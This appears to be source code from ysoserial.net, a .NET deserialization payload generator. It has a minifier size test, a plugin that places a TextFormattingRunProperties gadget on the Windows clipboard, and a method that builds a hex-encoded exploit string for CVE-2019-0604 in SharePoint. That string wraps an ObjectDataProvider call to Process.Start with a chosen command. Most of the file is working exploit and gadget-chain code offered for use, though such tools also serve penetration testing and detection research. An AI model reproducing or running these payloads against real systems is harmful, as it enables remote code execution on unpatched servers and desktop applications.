/// <summary>
/// Manual size comparison for the BinaryFormatter minifier: generates a
/// TextFormattingRunProperties stream for a sample command line, converts it to JSON,
/// passes it through <c>BinaryFormatterMinifier.MinimiseJsonAndRun</c>, and prints the
/// stream length before and after.
/// </summary>
/// <remarks>
/// Side effects: overwrites the <c>sampleInputArgs</c> field, writes to the console, and
/// blocks on <c>Console.ReadLine()</c> until Enter is pressed.
/// NOTE(review): the helper name <c>MinimiseJsonAndRun</c> suggests candidate streams are
/// deserialized while minimising; confirm against the helper before relying on that.
/// </remarks>
private void TextFormatterMinifying()
{
    const string targetApp = "TestConsoleApp_YSONET";
    sampleInputArgs = new InputArgs(targetApp + " /foo bar", true, false, true, true, true, null);
    bool isErrOk = false;

    // Baseline: the generator's unminified BinaryFormatter output.
    var generator = new TextFormattingRunPropertiesGenerator();
    byte[] initialBytes = (byte[])generator.GenerateWithNoTest("binaryformatter", sampleInputArgs);
    Console.WriteLine("Init size: " + initialBytes.Length);

    // Round-trip through the JSON representation so the minifier can work on it.
    MemoryStream initialStream = new MemoryStream(initialBytes);
    string initialJson = AdvancedBinaryFormatterParser.StreamToJson(initialStream, false, true, true);
    string minimisedJson = BinaryFormatterMinifier.MinimiseJsonAndRun(initialJson, sampleInputArgs, isErrOk, true);
    Console.WriteLine(minimisedJson);

    // Convert back to a stream only to measure the resulting size.
    MemoryStream minimisedStream = AdvancedBinaryFormatterParser.JsonToStream(minimisedJson);
    Console.WriteLine("Final size: " + minimisedStream.Length);

    // Keep the console window open until the operator presses Enter.
    Console.ReadLine();
}
/// <summary>
/// Parses the plugin options, wraps the TextFormattingRunProperties gadget in an
/// <c>AxHostStateMarshal</c>, stores it in a <c>System.Windows.Forms.DataObject</c> under
/// <c>format</c>, and places that object on the clipboard.
/// </summary>
/// <param name="args">Plugin command-line arguments, handed to <c>options.Parse</c>.</param>
/// <returns>The fixed status string <c>"Object copied to the clipboard"</c>.</returns>
/// <remarks>
/// OLE clipboard calls fail unless the calling thread is in single-threaded apartment (STA)
/// mode, and <c>[STAThread]</c> cannot be applied from inside a plugin, so all work runs on a
/// dedicated STA thread that is joined before returning.
/// An option-parsing error or a blank command prints a usage hint and ends the whole
/// process with exit code -1.
/// </remarks>
public object Run(string[] args)
{
    var clipboardThread = new Thread(() =>
    {
        InputArgs inputArgs = new InputArgs();

        try
        {
            // The returned list of unparsed arguments is not used by this plugin.
            options.Parse(args);
            inputArgs.Cmd = command;
            inputArgs.Minify = minify;
            inputArgs.UseSimpleType = useSimpleType;
            inputArgs.Test = test;
        }
        catch (OptionException parseError)
        {
            Console.Write("ysoserial: ");
            Console.WriteLine(parseError.Message);
            Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
            System.Environment.Exit(-1);
        }

        // IsNullOrWhiteSpace already covers the null and empty cases.
        if (String.IsNullOrWhiteSpace(command))
        {
            Console.Write("ysoserial: ");
            Console.WriteLine("Incorrect plugin mode/arguments combination");
            Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
            System.Environment.Exit(-1);
        }

        // Build the clipboard entry (System.Windows.Forms variant); autoConvert is off.
        var clipboardEntry = new System.Windows.Forms.DataObject();
        var wrappedGadget = new AxHostStateMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs));
        clipboardEntry.SetData(format, false, wrappedGadget);

        // Disabled alternative for the System.Windows clipboard:
        // myDataObject.SetData(format, new DataSetMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs)), false);

        Clipboard.Clear();
        // copy: true leaves the data on the clipboard after this process exits.
        Clipboard.SetDataObject(clipboardEntry, true);

        if (test)
        {
            // Self-test: read the entry back the way a consuming application would.
            // NOTE(review): this GetData call is presumably where the stored object is
            // deserialized, i.e. the consumer-side sink a defender would examine.
            try
            {
                IDataObject clipboardContent = Clipboard.GetDataObject();
                Object roundTripped = clipboardContent.GetData(format);
            }
            catch (Exception err)
            {
                Debugging.ShowErrors(inputArgs, err);
            }
        }
    });

    clipboardThread.SetApartmentState(ApartmentState.STA);
    clipboardThread.Start();
    clipboardThread.Join();

    return "Object copied to the clipboard";
}
/// <summary>
/// Builds the encoded string for the CVE-2019-0604 mode: an assembly-qualified type name
/// terminated by ':', followed by a minified XML document, all wrapped as
/// <c>"__bp"</c> + hex-encoded length field + hex-encoded payload.
/// </summary>
/// <returns>The encoded string; it always starts with the literal <c>__bp</c>.</returns>
/// <exception cref="OverflowException">
/// Thrown by the checked cast when <c>payload.Length &lt;&lt; 2</c> does not fit in a
/// <see cref="char"/>, i.e. when the un-encoded payload is longer than 16383 characters.
/// </exception>
/// <remarks>
/// When <c>useurl</c> is set, the document comes from
/// <c>TextFormattingRunPropertiesGenerator</c> (DataContractSerializer output, with
/// <c>cmd</c> passed as the <c>--xamlurl</c> value); otherwise it is the inline
/// ExpandedWrapper / XamlReader / ObjectDataProvider document with <c>cmd</c> split into a
/// file name and an optional argument string.
/// Side effect: the un-encoded payload is written to the console.
/// For detection work, <c>__bp</c> is the only fixed cleartext in the return value;
/// everything after it has passed through <c>HexEncode</c>, which is defined elsewhere.
/// </remarks>
public string CVE_2019_0604()
{
    /*
     * Readable form of the inline XML document used when useurl is false:
     *
     * string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
     *     <ExpandedElement/>
     *     <ProjectedProperty0>
     *         <MethodName>Parse</MethodName>
     *         <MethodParameters>
     *             <anyType xsi:type=""xsd:string"">
     *                 <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
     *             </anyType>
     *         </MethodParameters>
     *         <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
     *     </ProjectedProperty0>
     * </ExpandedWrapperOfXamlReaderObjectDataProvider>";
     */

    string typePrefix;
    string xmlBody;

    if (useurl)
    {
        // Delegate to the TextFormattingRunProperties generator; cmd is the XAML URL here.
        InputArgs inputArgs = new InputArgs
        {
            Cmd = "foobar",
            IsRawCmd = true,
            ExtraInternalArguments = new List<String> { "--variant", "3", "--xamlurl", cmd },
            Minify = true,
            UseSimpleType = true
        };

        // Assembly-qualified name with every space stripped, terminated by ':'.
        string qualifiedName = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":";
        typePrefix = qualifiedName.Replace(" ", "");

        TextFormattingRunPropertiesGenerator runPropertiesGenerator = new TextFormattingRunPropertiesGenerator();
        xmlBody = (string)runPropertiesGenerator.GenerateWithNoTest("DataContractSerializer", inputArgs);
    }
    else
    {
        typePrefix = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";

        // Element [1] is only read when the splitter reports that arguments are present.
        Boolean hasArgs;
        string[] commandParts = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);
        String methodParameters = hasArgs
            ? $@"<ObjectDataProvider.MethodParameters><b:String>{commandParts[0]}</b:String><b:String>{commandParts[1]}</b:String>"
            : $@"<ObjectDataProvider.MethodParameters><b:String>{commandParts[0]}</b:String>";

        xmlBody = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + methodParameters + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";
    }

    // Minify before encoding: the hex encoding enlarges the payload, and the length
    // field below is limited to what fits in a char.
    xmlBody = XMLMinifier.Minify(xmlBody, null, null, FormatterType.DataContractXML, true);

    string payload = typePrefix + xmlBody;
    Console.WriteLine(payload);

    // Length field: payload length shifted left by two bits; checked so that an
    // oversized payload throws instead of silently truncating.
    char lengthField = checked((char)(payload.Length << 2));

    StringBuilder encoded = new StringBuilder();
    encoded.Append("__bp");
    HexEncode(lengthField, encoded);
    HexEncode(payload, encoded);
    return encoded.ToString();
}